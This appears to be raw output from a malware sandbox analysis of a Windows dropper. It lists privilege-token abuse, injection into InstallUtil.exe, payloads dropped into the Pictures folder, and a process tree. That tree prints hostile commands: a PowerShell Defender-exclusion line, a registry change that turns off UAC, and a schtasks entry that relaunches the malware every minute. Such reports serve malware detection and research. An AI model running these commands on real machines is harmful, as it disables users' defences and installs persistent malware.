N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Users\Admin\Pictures\HoaNFn1AE4lUcIQYVg0suGHr.exe N/A
N/A N/A C:\Users\Admin\Pictures\HoaNFn1AE4lUcIQYVg0suGHr.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\is-CQ33T.tmp\8758677____.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\efNDwqgCtrrVs5VKrqH19cEQ.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4988 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4988 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4988 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4988 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4988 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4988 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4988 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4988 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4988 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4988 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2208 wrote to memory of 4436 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\ot6qO5lQLXmvkfSWcwZ48lXR.exe
PID 2208 wrote to memory of 4436 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\ot6qO5lQLXmvkfSWcwZ48lXR.exe
PID 2208 wrote to memory of 4436 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\ot6qO5lQLXmvkfSWcwZ48lXR.exe
PID 2208 wrote to memory of 2688 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\yIAAtiFZaBN5sQouZpblrsJG.exe
PID 2208 wrote to memory of 2688 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\yIAAtiFZaBN5sQouZpblrsJG.exe
PID 2208 wrote to memory of 2688 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\yIAAtiFZaBN5sQouZpblrsJG.exe
PID 2208 wrote to memory of 3556 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\oYX2u8fIAxUTdPgJpvdjbe4R.exe
PID 2208 wrote to memory of 3556 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\oYX2u8fIAxUTdPgJpvdjbe4R.exe
PID 2208 wrote to memory of 3556 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\oYX2u8fIAxUTdPgJpvdjbe4R.exe
PID 2208 wrote to memory of 4112 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\HoaNFn1AE4lUcIQYVg0suGHr.exe
PID 2208 wrote to memory of 4112 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\HoaNFn1AE4lUcIQYVg0suGHr.exe
PID 2208 wrote to memory of 4112 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\HoaNFn1AE4lUcIQYVg0suGHr.exe
PID 2208 wrote to memory of 3736 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\TUSMX21oo8cNdNBsovMfwZt9.exe
PID 2208 wrote to memory of 3736 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\TUSMX21oo8cNdNBsovMfwZt9.exe
PID 2208 wrote to memory of 3736 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\TUSMX21oo8cNdNBsovMfwZt9.exe
PID 2208 wrote to memory of 2832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\efNDwqgCtrrVs5VKrqH19cEQ.exe
PID 2208 wrote to memory of 2832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\efNDwqgCtrrVs5VKrqH19cEQ.exe
PID 2208 wrote to memory of 2832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\efNDwqgCtrrVs5VKrqH19cEQ.exe
PID 2208 wrote to memory of 4428 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe
PID 2208 wrote to memory of 4428 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe
PID 2208 wrote to memory of 4428 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe
PID 4428 wrote to memory of 5024 N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe
PID 4428 wrote to memory of 5024 N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe
PID 4428 wrote to memory of 5024 N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe
PID 3556 wrote to memory of 640 N/A C:\Users\Admin\Pictures\oYX2u8fIAxUTdPgJpvdjbe4R.exe C:\Users\Admin\AppData\Local\Temp\is-CLM27.tmp\oYX2u8fIAxUTdPgJpvdjbe4R.tmp
PID 3556 wrote to memory of 640 N/A C:\Users\Admin\Pictures\oYX2u8fIAxUTdPgJpvdjbe4R.exe C:\Users\Admin\AppData\Local\Temp\is-CLM27.tmp\oYX2u8fIAxUTdPgJpvdjbe4R.tmp
PID 3556 wrote to memory of 640 N/A C:\Users\Admin\Pictures\oYX2u8fIAxUTdPgJpvdjbe4R.exe C:\Users\Admin\AppData\Local\Temp\is-CLM27.tmp\oYX2u8fIAxUTdPgJpvdjbe4R.tmp
PID 3736 wrote to memory of 1676 N/A C:\Users\Admin\Pictures\TUSMX21oo8cNdNBsovMfwZt9.exe C:\Users\Admin\AppData\Local\Temp\is-NOULQ.tmp\TUSMX21oo8cNdNBsovMfwZt9.tmp
PID 3736 wrote to memory of 1676 N/A C:\Users\Admin\Pictures\TUSMX21oo8cNdNBsovMfwZt9.exe C:\Users\Admin\AppData\Local\Temp\is-NOULQ.tmp\TUSMX21oo8cNdNBsovMfwZt9.tmp
PID 3736 wrote to memory of 1676 N/A C:\Users\Admin\Pictures\TUSMX21oo8cNdNBsovMfwZt9.exe C:\Users\Admin\AppData\Local\Temp\is-NOULQ.tmp\TUSMX21oo8cNdNBsovMfwZt9.tmp
PID 2208 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\0YQWaRmoOozYpx6E5N1eJwqY.exe
PID 2208 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\0YQWaRmoOozYpx6E5N1eJwqY.exe
PID 2208 wrote to memory of 4356 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe
PID 2208 wrote to memory of 4356 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe
PID 2208 wrote to memory of 4356 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe
PID 4436 wrote to memory of 4680 N/A C:\Users\Admin\Pictures\ot6qO5lQLXmvkfSWcwZ48lXR.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 4436 wrote to memory of 4680 N/A C:\Users\Admin\Pictures\ot6qO5lQLXmvkfSWcwZ48lXR.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 4436 wrote to memory of 4680 N/A C:\Users\Admin\Pictures\ot6qO5lQLXmvkfSWcwZ48lXR.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2208 wrote to memory of 4120 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe
PID 2208 wrote to memory of 4120 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe
PID 2208 wrote to memory of 4120 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe
PID 2208 wrote to memory of 2868 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\P9d600cTodNEw5L3522pm2me.exe
PID 2208 wrote to memory of 2868 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\P9d600cTodNEw5L3522pm2me.exe
PID 4428 wrote to memory of 1780 N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pimnFhRU6OPmPZcL39zf5wL2.exe
PID 4428 wrote to memory of 1780 N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pimnFhRU6OPmPZcL39zf5wL2.exe
PID 4428 wrote to memory of 1780 N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pimnFhRU6OPmPZcL39zf5wL2.exe
PID 640 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\is-CLM27.tmp\oYX2u8fIAxUTdPgJpvdjbe4R.tmp C:\Users\Admin\AppData\Local\Temp\is-CL0AP.tmp\_isetup\_setup64.tmp
PID 640 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\is-CLM27.tmp\oYX2u8fIAxUTdPgJpvdjbe4R.tmp C:\Users\Admin\AppData\Local\Temp\is-CL0AP.tmp\_isetup\_setup64.tmp
PID 4428 wrote to memory of 3956 N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe
PID 4428 wrote to memory of 3956 N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe
PID 4428 wrote to memory of 3956 N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe
PID 3956 wrote to memory of 2524 N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe
PID 3956 wrote to memory of 2524 N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe
PID 3956 wrote to memory of 2524 N/A C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe

"C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\831fc1d8df2be45780ee06e59dabb36b787c3f26f544b67688cfa91c10f5dbbf.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Pictures\yIAAtiFZaBN5sQouZpblrsJG.exe

"C:\Users\Admin\Pictures\yIAAtiFZaBN5sQouZpblrsJG.exe"

C:\Users\Admin\Pictures\ot6qO5lQLXmvkfSWcwZ48lXR.exe

"C:\Users\Admin\Pictures\ot6qO5lQLXmvkfSWcwZ48lXR.exe"

C:\Users\Admin\Pictures\oYX2u8fIAxUTdPgJpvdjbe4R.exe

"C:\Users\Admin\Pictures\oYX2u8fIAxUTdPgJpvdjbe4R.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\Pictures\efNDwqgCtrrVs5VKrqH19cEQ.exe

"C:\Users\Admin\Pictures\efNDwqgCtrrVs5VKrqH19cEQ.exe"

C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe

"C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe" --silent --allusers=0

C:\Users\Admin\AppData\Local\Temp\is-CLM27.tmp\oYX2u8fIAxUTdPgJpvdjbe4R.tmp

"C:\Users\Admin\AppData\Local\Temp\is-CLM27.tmp\oYX2u8fIAxUTdPgJpvdjbe4R.tmp" /SL5="$901DC,5025136,832512,C:\Users\Admin\Pictures\oYX2u8fIAxUTdPgJpvdjbe4R.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\AppData\Local\Temp\is-NOULQ.tmp\TUSMX21oo8cNdNBsovMfwZt9.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NOULQ.tmp\TUSMX21oo8cNdNBsovMfwZt9.tmp" /SL5="$1801E2,491750,408064,C:\Users\Admin\Pictures\TUSMX21oo8cNdNBsovMfwZt9.exe"

C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe

C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6f128538,0x6f128548,0x6f128554

C:\Users\Admin\Pictures\0YQWaRmoOozYpx6E5N1eJwqY.exe

"C:\Users\Admin\Pictures\0YQWaRmoOozYpx6E5N1eJwqY.exe"

C:\Users\Admin\Pictures\TUSMX21oo8cNdNBsovMfwZt9.exe

"C:\Users\Admin\Pictures\TUSMX21oo8cNdNBsovMfwZt9.exe"

C:\Users\Admin\Pictures\HoaNFn1AE4lUcIQYVg0suGHr.exe

"C:\Users\Admin\Pictures\HoaNFn1AE4lUcIQYVg0suGHr.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Users\Admin\Pictures\P9d600cTodNEw5L3522pm2me.exe

"C:\Users\Admin\Pictures\P9d600cTodNEw5L3522pm2me.exe"

C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe

"C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4428 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231005044833" --session-guid=b6680970-9f24-4241-b06e-ddbf6fca857f --server-tracking-blob=NzQyNmY2NzhjNzBkZGY1NzFhMzQwYTM1MWMzOWY0Njc1ZTM0OGNkNzRlNDNlMmYxYWI0NTI1Yzc0YWM4YmE3NTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5NjQ4MTMwNS45OTY0IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI3Yzg3MDdkYS03MGViLTRiOGMtYWE4ZS04YzgyZTNiOTdhMDkifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=6804000000000000

C:\Users\Admin\AppData\Local\Temp\is-CL0AP.tmp\_isetup\_setup64.tmp

helper 105 0x34C

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pimnFhRU6OPmPZcL39zf5wL2.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pimnFhRU6OPmPZcL39zf5wL2.exe" --version

C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe

C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2c0,0x2c4,0x2c8,0x258,0x2cc,0x6d678538,0x6d678548,0x6d678554

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe

